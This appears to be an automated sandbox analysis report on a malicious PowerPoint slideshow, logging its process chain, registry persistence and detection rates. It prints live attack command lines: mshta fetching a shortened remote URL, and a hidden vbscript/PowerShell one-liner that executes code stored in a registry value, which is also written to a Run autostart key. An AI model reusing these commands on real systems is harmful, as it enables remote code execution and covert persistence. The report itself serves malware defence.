                Source: 16.2.InstallUtil.exe.400000.0.unpack, xgw.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winPPS@15/12@6/4
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0028B1E6 AdjustTokenPrivileges,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0028B1AF AdjustTokenPrivileges,
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scan emco Bautechni specification.LNKJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD61F.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Scan emco Bautechni specification.ppsVirustotal: Detection: 69%
                Source: Scan emco Bautechni specification.ppsReversingLabs: Detection: 67%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
                Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ((gp HKCU:\Software).Fucku)|IEX
                Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe {path}
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
                Source: Binary string: mscorrc.pdb source: InstallUtil.exe, 0000000F.00000002.1226137253.04030000.00000002.00000001.sdmp

                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6D800 pushad ; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_042744BF push 850FC085h; retn 0007h
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 16_2_00B2D800 pushad ; ret

                Persistence and Installation Behavior:

                barindex
                Creates processes via WMIShow sources
                Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                Boot Survival:

                barindex
                Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
                Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run koaskd mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).Fucku)|IEX"", 0 : window.close")Jump to behavior
                Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run koaskdJump to behavior
                Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run koaskdJump to behavior

                Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
